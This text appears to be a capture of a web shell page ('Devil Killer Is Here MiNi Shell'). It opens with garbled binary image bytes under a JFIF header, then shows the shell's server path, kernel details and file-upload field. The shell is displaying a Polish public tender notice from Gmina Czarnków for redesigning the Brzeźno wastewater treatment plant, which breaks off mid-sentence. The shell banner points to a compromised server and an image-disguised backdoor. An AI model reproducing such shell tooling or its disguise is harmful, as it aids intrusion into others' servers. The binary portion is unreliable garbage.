JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220411/0011794501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Modernizacja istniejącej oczyszczalni ścieków w Brzeźnie – dokumentacja techniczna” wraz z uzyskaniem pozwolenia na budowę oraz pełnieniem nadzoru autorskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CZARNKÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791069</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rybaki 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czarnków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@czarnkowgmina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czarnkowgmina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Modernizacja istniejącej oczyszczalni ścieków w Brzeźnie – dokumentacja techniczna” wraz z uzyskaniem pozwolenia na budowę oraz pełnieniem nadzoru autorskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9757ba56-b994-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00117945</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022649/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Modernizacja istniejącej oczyszczalni ścieków w Brzeźnie - dokumentacja techniczna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_czarnkow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_czarnkow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/pn/gmina_czarnkow</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">5. Ochrona danych osobowych zebranych przez Zamawiającego w toku<br/>postępowania<br/>a) Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO,<br/>tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z<br/>RODO oraz zgodnie z przepisami krajowymi.<br/>b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego pn. Modernizacja Oczyszczalni ścieków w Brzeźnie Gmina Czarnków<br/>c) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub<br/>podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie<br/>z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o<br/>dostępie do informacji publicznej.<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą<br/>przechowywane przez okres 5 lat.<br/>7<br/>e) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w<br/>załączniku nr 6 do SWZ.<br/>f) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu<br/>innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował<br/>przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały<br/>zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem<br/>poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej<br/>wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym<br/>postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych<br/>wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu<br/>o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób<br/>fizycznych, których dane osobowe dotyczą i od których dane te wykonawca<br/>bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub<br/>dokumentów składanych na żądanie Zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych,<br/>których dane wykonawca pozyskał w sposób pośredni, a które to dane<br/>wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów<br/>składanych na żądanie Zamawiającego.<br/>h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz<br/>ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z udziałem w postępowaniu, wykonawca składa<br/>oświadczenia o wypełnieniu przez niego obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>załączniku nr 1 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">i) Zamawiający informuje, że:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane<br/>osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>- Udostępnianie protokołu i załączników do protokołu ma zastosowanie do<br/>wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1<br/>RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne,<br/>poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do<br/>związków zawodowych oraz przetwarzania danych genetycznych, danych<br/>biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub<br/>danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby),<br/>zebranych w toku postępowania o udzielenie zamówienia.<br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane<br/>przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO<br/>(związanych z prawem wykonawcy do uzyskania od administratora<br/>potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem<br/>wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o<br/>których mowa w art. 46 RODO, związanych z przekazaniem jego danych<br/>osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem<br/>otrzymania przez wykonawcę od administratora kopii danych osobowych<br/>8<br/>podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym<br/>mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych), nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art.<br/>18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole postępowania lub załącznikach do tego protokołu, od<br/>dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie<br/>udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18<br/>ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowej dla<br/>zadania pn.: &#34;Modernizacja istniejącej oczyszczalni ścieków w Brzeźnie – dokumentacja<br/>techniczna” wraz z uzyskaniem pozwolenia na budowę oraz pełnieniem nadzoru<br/>autorskiego.<br/>1) Opis stanu istniejącego:<br/>Stacja zlewcza STZ 201 M1S<br/>Zbiornik retencyjny uśredniający V-135m3 czynna, wym.8,1x6,6x3,0m<br/>Sitopiaskownik SP 10 dcm3/sek<br/>Dwa ciągi technologiczne 3 komorowe dł. 19,0m x 6,0m x 3,6m każdy ciąg<br/>Osadniki wtórne 2 x 3,0 szt wym. 2,5m x 2,5m x 3,6m<br/>Stacja dozowania środków chemicznych<br/>Mieszacz labiryntowy- ściany bet. wym. 2,0x1,5mx2,0m<br/>Komora pomiarowa ścieków oczyszczonych z przepływomierzem DN 150<br/>elektromagnet.<br/>Zagęszczacz osadu nadmiernego szt. 3,0 poj. 25,0m3 każdy<br/>Budynek technologiczny:<br/>- prasa taśmowa Monobelt NP06 AD EKOFIN<br/>- zestaw przygotowania polielektrolitu<br/>- zestaw higienizacji wapnem palonym MINHIG MH-03 EKOFIN<br/>- przenośnik osadu śrubowy w obudowie metalowej<br/>- dmuchawy szt. 4,0 AIRTECH ODI 112<br/>9<br/>Płyta odkładcza osadów odwodnionych m 17,3 x 12,4 m2 214,52<br/>Płyta odkładcza skratek i piasku<br/>Drogi dojazdowe z płyt żelbet. 3,0x0,15x1,0m m2 1325,0<br/>Monitoring z wizualizacją Hydro Partner Leszno<br/>3. Przedmiotem zamówienia jest opracowanie dokumentacji projektowo<br/>technicznej uwzględniającej:<br/>- Wymianę ze względu na stopień zużycia stacji zlewczej STZ 201 M1S kpl.1,0<br/>na tego samego typu lub porównawczą o tych samych parametrach<br/>- Wykonanie drugiego zbiornika uśredniającego V-135/160m3 / 8,1x6,6x3,0m /<br/>- Wykonanie komory rozdziału ścieków napływających do ciągu technologicznego<br/>Studnia żelbet. d-1200mm z zasuwami nożowymi i regulacją przepływu<br/>- Rozebranie istniejącej płyty odkładczej /ściany z betonu grub20cm i bloczków bet.,<br/>dno ze zbrojonego betonu grub.20 cm m2 17,3 x 12,4 x 0,2m ściany 2x/17,3+12,4/ x<br/>1,0m<br/>- Rozebranie istniejącej nawierzchni z płyt drogowych m2 1332,0<br/>- Wymianę ze względu zużycia istniejącego sito piaskownika typ SP Q 10 dcm3/s<br/>na piaskownik Q 15-20 dcm3/sek z technologią odtłuszczania i płukania piasku.<br/>Należy przenieść sito piaskownik na początek procesu technologicznego za stacją<br/>zlewczą<br/>- Wykonanie budynku dla sito piaskownika z elementów z blachy wielowarstwowej<br/>grub.10cm<br/>- Budowę ciągu technologicznego poj.294,0m3/zbiornik ze stali nierdzewnej w ziemi /<br/>Wym . 19,0m x 4,3m x 3,6m = 294,0m3<br/>- Budowę osadników wtórnych szt. 3,0 wym.2,5 x 2,5 x 3,6m ze stali nierdzewnej<br/>- Wykonanie pomostów na ciągach technologicznych ze stali nierdzewnej dł. 19,0m x<br/>3,0 szt ze stali nierdzewnej<br/>- Wykonanie schodów ze stali nierdzewnej w ciągach technologicznych<br/>- Wymianę istniejącej prasy odwadniającej ze względu na stopień zużycia na prasę<br/>śrubową z flokulatorem wraz osprzętem – wydajność wg.obliczeń projektowych<br/>s.m. na poziomie 20%. Uwzględnić odzyskanie wody na cele technologiczne<br/>- Wymianę istniejących dmuchaw typu AIRTECH ODI 112 ze względu stopień zużycia<br/>oraz niewystarczającą wydajność obecnie i po rozbudowie biobloku wydajność<br/>zaprojektować na podstawie obliczeń zapotrzebowania na tlen w biobloku<br/>Dostosować do zapotrzebowania tlenu zwiększonej przepustowości Q o 294m3/d<br/>- Wykonanie wiaty na odwodniony osad / konstrukcja stalowa z dachem z blachy<br/>trapezowej lub blacho dachówki, płyta żelbet. , ściany żelbet. z trzech stron 1,0m wys.<br/>wym. 17,0m x 12,0m x 3,0m ściany o wys. 1,0m z bloczków bet. 3,0 strony<br/>- Wykonanie taśmociągu do transportu odwodnionego osadu dł. 10,0m z<br/>zabezpieczeniem taśmy lub podajnika śrubowego przed zamarzaniem<br/>- Wykonanie odprowadzania odcieków z osadu do ponownego oczyszczenia<br/>- Wykonanie płyty odkładczej na osady z przydomowych oczyszczalni / Konstrukcja<br/>stalowa z dachem z blachy trapezowej lub blacho dachówki , płyta żelbet. ściany<br/>o wym. 10,0m x 12,0m x 0,24m x 1,0m z bloczków bet.<br/>- Zainstalowanie odnawialnych źródeł energii /fotovoltaika, solary/ na potrzeby<br/>urządzeń technologicznych oraz oświetlenia pomieszczeń technologicznych i<br/>10<br/>socjalnych oraz oświetlenia zewnętrznego, ogrzewania. Zainstalowana moc prądu<br/>winna wynikać z mocy energii elektrycznej zainstalowanej wg. Projektu<br/>uwzględniające wszystkie urządzenia na oczyszczalni<br/>- Wymianę sieci wodociągowej PCV i kanalizacyjnych /woda PE d-100mm dł. 300,0m,<br/>kanalizacja grawitacyjna PVC i kamionka 300mm dł.600,0m. Wykonanie kanalizacji<br/>tłocznej PE 110mm mb 150,0<br/>- Dostosowanie istniejącego programu wizualizacji i sterowania do warunków po<br/>zakończeniu modernizacji<br/>- W projekcie należy uwzględnić również wszystkie instalacje elektryczne, wod-kan i<br/>inne niezbędne do funkcjonowania oczyszczalni.<br/>Wszystkie elementy stalowe w projekcie należy zaprojektować do wykonania<br/>ze stali kwasodpornej min. AISI 316<br/>W zakres zadania wchodzi:<br/>1) opracowanie map sytuacyjno-wysokościowych do celów projektowych<br/>obejmujących teren inwestycji;<br/>2) sporządzenie projektu budowlano-wykonawczego zgodnie z obowiązującymi<br/>przepisami w branży architektonicznej, konstrukcyjno-budowlanej, sanitarnej,<br/>elektrycznej ze szczególnym uwzględnieniem Ustawy z dnia 7 lipca 1994 roku<br/>Prawo budowlane (t.j. Dz. U. z 2021 r. poz. 2351 z późn. zm.), Rozporządzenie<br/>Ministra Rozwoju z 11 września 2020 r. w sprawie szczegółowego zakresu i formy<br/>projektu budowlanego (Dz. U. poz. 1609 z późn. zm.) oraz Rozporządzenia<br/>Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego<br/>zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i<br/>odbioru robót budowlanych oraz programu funkcjonalno – użytkowego (Dz. U.<br/>poz. 2454)<br/>3) uzyskanie wszelkich wymaganych badań, opinii, uzgodnień, decyzji i pozwoleń z<br/>pozwoleniem wodnoprawnym włącznie;<br/>4) sporządzenie przedmiaru i kosztorysu w wersji papierowej oraz w formie<br/>elektronicznej. Wykonawca zobowiązany jest do szczegółowego ustalenia zakresu<br/>przedmiotowego wykonania kosztorysów (uwzględniających etapy późniejszej<br/>realizacji w ramach robót budowlanych zleconych przez Zamawiającego);<br/>5) sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych;<br/>6) uzyskanie w imieniu Zamawiającego pozwolenia na budowę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71354000-4 - Usługi sporządzania map</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">230 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunek/warunki udziału w<br/>postępowaniu dotyczący/-e:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa dodatkowych wymagań.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa dodatkowych wymagań.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa dodatkowych wymagań.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności technicznej lub<br/>zawodowej jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich trzech lat, przed dniem składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonanie minimum 3<br/>dokumentacji projektowych budowy lub przebudowy/modernizacji oczyszczalni ścieków<br/>o przepustowości min. 300 m3/d; co potwierdzi w wykazie wykonanych usług, ich<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały<br/>wykonane, z załączeniem dowodów potwierdzających, że zostały one wykonane<br/>należycie, przy czym dokumentami potwierdzającymi, o których mowa, są referencje<br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Spełnianie warunku wykonawca potwierdzi poprzez złożenie wykazu usług wg<br/>załącznika nr 4 do SWZ. Zamawiający dokona oceny na zasadzie spełnia/nie spełnia.<br/>14<br/>b) dysponuje osobami zdolnymi do wykonywania zamówienia:<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności sanitarnej, który posiada wykształcenie minimum średnie,<br/>staż pracy min. 3 letni i wykonał minimum 1 projekt budowy/przebudowy oczyszczalni<br/>ścieków o przepustowości min. 300 m3/d<br/>-1 